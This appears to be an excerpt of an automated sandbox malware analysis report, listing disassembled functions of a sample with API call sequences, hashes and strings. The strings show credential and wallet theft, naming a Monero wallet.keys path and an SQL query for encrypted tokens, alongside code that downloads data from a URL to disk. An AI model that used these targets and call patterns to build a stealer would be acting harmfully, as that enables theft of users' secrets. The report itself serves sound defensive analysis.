                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                      • String ID: %d MB$@
                      • API String ID: 2774356765-3474575989
                      • Opcode ID: d621ab8a7f1857d8a872df0f465668caefc568c8318dd664c1b0bfc120e6cf57
                      • Instruction ID: 66f3508b08088f98e751089898fb73a8fa63c7717a4b83b489ff4ea8bf122830
                      • Opcode Fuzzy Hash: d621ab8a7f1857d8a872df0f465668caefc568c8318dd664c1b0bfc120e6cf57
                      • Instruction Fuzzy Hash: 2E211AB1E44258ABDB00DFD5DC49FAEB7B9FB44B10F104619F605BB2C0D77869018BA5
                      Function 003D60A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                        • Part of subcall function 003D47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003D4839
                        • Part of subcall function 003D47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003D4849
                      • InternetOpenA.WININET(003F0DF7,00000001,00000000,00000000,00000000), ref: 003D610F
                      • StrCmpCA.SHLWAPI(?,0108E978), ref: 003D6147
                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 003D618F
                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003D61B3
                      • InternetReadFile.WININET(?,?,00000400,?), ref: 003D61DC
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 003D620A
                      • CloseHandle.KERNEL32(?,?,00000400), ref: 003D6249
                      • InternetCloseHandle.WININET(?), ref: 003D6253
                      • InternetCloseHandle.WININET(00000000), ref: 003D6260
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                      • String ID:
                      • API String ID: 2507841554-0
                      • Opcode ID: ba0b3d4b15315b3a256f8af771502461b290580a26aefc56b349808273b21eb7
                      • Instruction ID: a69658d5e7fc934ba902e286066d002addf3282f1e11e0269215988a80411e70
                      • Opcode Fuzzy Hash: ba0b3d4b15315b3a256f8af771502461b290580a26aefc56b349808273b21eb7
                      • Instruction Fuzzy Hash: 1E51A0B1900218ABDB21DFA0DC46BEE77B9FB44301F10859AF605AB2C1DB746B85CF95
                      Function 003DBA80 Relevance: 12.3, APIs: 4, Strings: 4, Instructions: 284stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                      • lstrlen.KERNEL32(00000000), ref: 003DBC9F
                        • Part of subcall function 003E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003E8E52
                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 003DBCCD
                      • lstrlen.KERNEL32(00000000), ref: 003DBDA5
                      • lstrlen.KERNEL32(00000000), ref: 003DBDB9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                      • API String ID: 3073930149-1079375795
                      • Opcode ID: 249958958f733981018644a561cb04951b384ba50a4cfcfa8aec8e3927b211f5
                      • Instruction ID: 8c6634b95f292222d5fa7721b9c0003ac3f84fb4d605388eb1253cf0d5f09166
                      • Opcode Fuzzy Hash: 249958958f733981018644a561cb04951b384ba50a4cfcfa8aec8e3927b211f5
                      • Instruction Fuzzy Hash: 51B197729106589BDB06FBA1DC92EEE7739AF14300F414219F5066B1D2EF347E49CBA2
                      Function 003E6770 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 27COMMON
                      Download Yara Rule
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExitProcess$DefaultLangUser
                      • String ID: *
                      • API String ID: 1494266314-163128923
                      • Opcode ID: 7d788fc7e587837ef11fc63b61e74c587701137b446eca33176492c14da14941
                      • Instruction ID: 765694d62dca1c0dde6951fe7381385e598f246b950c13033da69ba7414f9071
                      • Opcode Fuzzy Hash: 7d788fc7e587837ef11fc63b61e74c587701137b446eca33176492c14da14941
                      • Instruction Fuzzy Hash: 4CF0E234905208EFD3419FE0E80A7AC7B71FB05713F08829EF609862C0D6304B41CB92
                      Function 003D4FB0 Relevance: 10.6, APIs: 7, Instructions: 83networkmemoryfileCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 003D4FCA
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003D4FD1
                      • InternetOpenA.WININET(003F0DDF,00000000,00000000,00000000,00000000), ref: 003D4FEA
                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 003D5011
                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 003D5041
                      • InternetCloseHandle.WININET(?), ref: 003D50B9
                      • InternetCloseHandle.WININET(?), ref: 003D50C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                      • String ID:
                      • API String ID: 3066467675-0
                      • Opcode ID: 37ac9142c8510f8c0b0105a8ae024d0b8d0f5fa23598acb1d82e02b527bdd346
                      • Instruction ID: ee10d5dab5c79bd7a3697de18ccd424922aa77acc1a1a265f505b4a6e54ad919
                      • Opcode Fuzzy Hash: 37ac9142c8510f8c0b0105a8ae024d0b8d0f5fa23598acb1d82e02b527bdd346
                      • Instruction Fuzzy Hash: 8E31F5B5A01218ABDB20CF94DC85BDDB7B9EB48704F1081D9FB09A7281D7706AC58F99
                      Function 003E83DC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                      Download Yara Rule
                      APIs
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 003E8426
                      • wsprintfA.USER32 ref: 003E8459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 003E847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 003E848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 003E8499
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                      • RegQueryValueExA.ADVAPI32(00000000,0108E0A0,00000000,000F003F,?,00000400), ref: 003E84EC
                      • lstrlen.KERNEL32(?), ref: 003E8501
                      • RegQueryValueExA.ADVAPI32(00000000,0108DF98,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,003F0B34), ref: 003E8599
                      • RegCloseKey.ADVAPI32(00000000), ref: 003E8608
                      • RegCloseKey.ADVAPI32(00000000), ref: 003E861A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                      • String ID: %s\%s
                      • API String ID: 3896182533-4073750446
                      • Opcode ID: aa2671e4262292edc53b04227171982190268e082adf149a3b801034b78dd8cf
                      • Instruction ID: d93400b017827393643bf60b4f2e8f3f0570213069e0f250a42ea75c6ab4a59b
                      • Opcode Fuzzy Hash: aa2671e4262292edc53b04227171982190268e082adf149a3b801034b78dd8cf
                      • Instruction Fuzzy Hash: 9C210A7191022C9BDB64DF94DC85FE9B7B9FB48700F04C299E60996180DF716A85CFD4
                      Function 003E7690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003E76A4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E76AB
                      • RegOpenKeyExA.ADVAPI32(80000002,0107C578,00000000,00020119,00000000), ref: 003E76DD
                      • RegQueryValueExA.ADVAPI32(00000000,0108E0B8,00000000,00000000,?,000000FF), ref: 003E76FE
                      • RegCloseKey.ADVAPI32(00000000), ref: 003E7708
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: Windows 11
                      • API String ID: 3225020163-2517555085
                      • Opcode ID: b7872a5d006525d6840d41dd9f110dfcde5cffd5b485540952ae51cfcbc4855e
                      • Instruction ID: d9896b1f1c341e31355854e776e4493269da82e4a8830ade117ad37cf3486d98
                      • Opcode Fuzzy Hash: b7872a5d006525d6840d41dd9f110dfcde5cffd5b485540952ae51cfcbc4855e
                      • Instruction Fuzzy Hash: 2F018FB9A00208BBD701DBE5DD49FBAB7B9EB08700F008156FA04D72D1E6709A008B51
                      Function 003E7720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON
                      Download Yara Rule
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003E7734
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E773B
                      • RegOpenKeyExA.ADVAPI32(80000002,0107C578,00000000,00020119,003E76B9), ref: 003E775B
                      • RegQueryValueExA.ADVAPI32(003E76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 003E777A
                      • RegCloseKey.ADVAPI32(003E76B9), ref: 003E7784
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: CurrentBuildNumber
                      • API String ID: 3225020163-1022791448
                      • Opcode ID: 50492ad48e5f8c8ef49028daecd26a6f12ccda8b296703665849ad4f8bc21f12
                      • Instruction ID: 0f70e919b39f428da1069ff400ee3cf38a6bc741c60f1e9278a23b2202189c96
                      • Opcode Fuzzy Hash: 50492ad48e5f8c8ef49028daecd26a6f12ccda8b296703665849ad4f8bc21f12
                      • Instruction Fuzzy Hash: 2801F4B9A40308FBDB01DBE4DC49FFEB7B9EB44701F148555FA05A7281DA705A008B51
                      Function 003E92E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON
                      Download Yara Rule
                      APIs
                      • CreateFileA.KERNEL32(:>,80000000,00000003,00000000,00000003,00000080,00000000,?,003E3AEE,?), ref: 003E92FC
                      • GetFileSizeEx.KERNEL32(000000FF,:>), ref: 003E9319
                      • CloseHandle.KERNEL32(000000FF), ref: 003E9327
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: File$CloseCreateHandleSize
                      • String ID: :>$:>
                      • API String ID: 1378416451-2938857274
                      • Opcode ID: 23674ae9423d9cfb1bb3897978f20e66c1048ab48a065da749ae3ce237690e63
                      • Instruction ID: 970f1399a3b8762aace34ceb8b57dd6abe8502d71f379d0476522e9379503330
                      • Opcode Fuzzy Hash: 23674ae9423d9cfb1bb3897978f20e66c1048ab48a065da749ae3ce237690e63
                      • Instruction Fuzzy Hash: 49F04439E40204FBDB11DFF1DC45F9E77B9AB48710F15C255B951A71C0D67097018B40
                      Function 003E40B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON
                      Download Yara Rule
                      APIs
                      • memset.MSVCRT ref: 003E40D5
                      • RegOpenKeyExA.ADVAPI32(80000001,0108D620,00000000,00020119,?), ref: 003E40F4
                      • RegQueryValueExA.ADVAPI32(?,0108E1A8,00000000,00000000,00000000,000000FF), ref: 003E4118
                      • RegCloseKey.ADVAPI32(?), ref: 003E4122
                      • lstrcat.KERNEL32(?,00000000), ref: 003E4147
                      • lstrcat.KERNEL32(?,0108E208), ref: 003E415B
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$CloseOpenQueryValuememset
                      • String ID:
                      • API String ID: 2623679115-0
                      • Opcode ID: 3aba493f823e96db059aaa86af0cbe3e04eb146b71d8803ab63fa8008dce7998
                      • Instruction ID: d210e8319660ab00534eff7514c9f0a35aa8d29e1ec3590428eef92024a8e2be
                      • Opcode Fuzzy Hash: 3aba493f823e96db059aaa86af0cbe3e04eb146b71d8803ab63fa8008dce7998
